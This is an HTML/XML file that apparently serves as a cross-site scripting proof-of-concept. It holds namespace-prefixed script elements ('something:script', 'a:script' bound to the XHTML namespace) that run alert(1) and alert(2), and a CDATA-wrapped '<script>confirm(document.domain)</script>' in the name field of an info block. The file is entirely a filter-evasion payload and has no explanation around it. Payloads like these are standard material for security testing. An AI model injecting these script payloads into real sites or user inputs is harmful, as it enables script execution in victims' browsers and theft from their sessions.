<html>
	<head></head>
	<body>
		<something:scriptxmlns:something="http://www.w3.org/1999/xhtml">alert(1)</something:script>
		<a:scriptxmlns:a="http://www.w3.org/1999/xhtml">alert(2)</a:script>
		<info>
		<name>
		<value><![CDATA[<script>confirm(document.domain)</script>]]></value>
		</name>
		<description>
		<value>Hello</value>
		</description>
		<url>
		<value>http://google.com</value>
		</url>
		</info>
	</body>
</html>
